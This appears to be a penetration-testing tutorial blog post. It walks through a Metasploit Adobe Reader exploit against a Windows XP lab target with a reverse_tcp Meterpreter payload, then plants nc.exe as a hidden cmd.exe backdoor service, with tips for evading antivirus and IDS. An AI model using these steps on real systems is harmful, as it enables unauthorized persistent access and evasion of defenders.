Netcat is a useful security/networking tool that has been around since the dawn of the dinosaurs. However, it still holds credibility amongst security professionals even today, probably due to its inherent features and versatile design that make it an effective "swiss army knife" for most computer enthusiasts. Penetration tests some times require the security professional to maintain access to the compromised target even when he looses the original avenue of attack. A network IPS, Firewall, Virus detection defense mechanism could trip after the fact, like when trying to implant a Trojan or Virus as your backdoor. This could cause your Metasploit meterpreter shell to loose connection with its session/target and even create a new policy to block your IP address. After working so hard to get the client side attack to exploit you wouldn't want all of your hard work to go in vein.
Using netcat (or cryptcat) to pop command shells from the compromised target to alternate ports/IP addresses is still an effective way of staying under the radar and maintaining access to the compromised target. For instance, not all anti-virus software will detect the presence of the nc.exe program. Its not to say you couldn't do all of this with Metasploit or some other tool but its cool to use alternative methods and change it up sometimes ;-)
(I don't condone unethical hacking. Use at your own risk!!!)
Example (Objectives):
- Target Image: Windows XP running vulnerable version of Adobe Reader (7, 8)
- Attack Image: Whatever you want
- Pop a shell on a windows target using the client-side Metasploit Universal Adobe exploit
- Upload "nc.exe" to a safe location (maybe some place where a virus scanner wouldn't be running and an integrity checking tool wouldn't be monitoring) on the compromised target and start a netcat/cryptcat listener running the "cmd.exe" command on a common port
- On the attack system, use netcat to connect to the listening port on the compromised system...bam...instant command shell (if you use cryptcat you will have encryption to help evade a network IDS)
- Perform as many times as necessary, but not too much! Remain stealth!
- On the attack image launch the metasploit 3.x command console
- Use the Adobe Acrobat universal exploit. You can search for it in msfconsole
command: use exploit name
- You should now be using the exploit name. Set the options for the payload/exploit
(set all of the values you need)
Example:
command: set LHOST yourip
command: set SRVPORT 80
command: set URIPATH adobe
command: set payload windows/meterpreter/reverse_tcp
command: exploit
(should start http listener on your attack image)
- On your Windows XP target, open a browser window and put in the http://ipaddress/adobe/urlstring to launch the exploit(Adobe should attempt to run the document and hang)
- On your attack system see if the exploit ran successfully
(Metasploit will tell you if the exploit was successful and if a session was created with the compromised system. If not...try again or try another exploit/avenue of attack...)
- If all went well you should now be in your new session.
- Now use the meterpreter shell to upload the nc.exe program to the compromised system
- Copy the nc.exe file to the attack system installdirectory/Framework3/msf3 directory. This is where you rmeterpreter shell will attempt to grab the nc.exe program from when you use the upload function
- Now run the upload command in the meterpreter shell to upload nc.exe to the target's system32 directory
- Now use meterpreter to execute the nc.exe file and run as a service in the background
(The process should be created on the compromised system)
- Use netcat on your attack image to connect to the port hosting the command shell (cmd.exe)
Now you should have another remote back door. Connect as many times as you want and open up as many shells as you need. Then Close out of your meterpreter session, close metasploit.....look....you still have a shell :-)
References:
http://blogs.msdn.com - netcat picture
http://www.ol-service.com/sikurezza/doc/netcat_eng.pdf - netcat command syntax
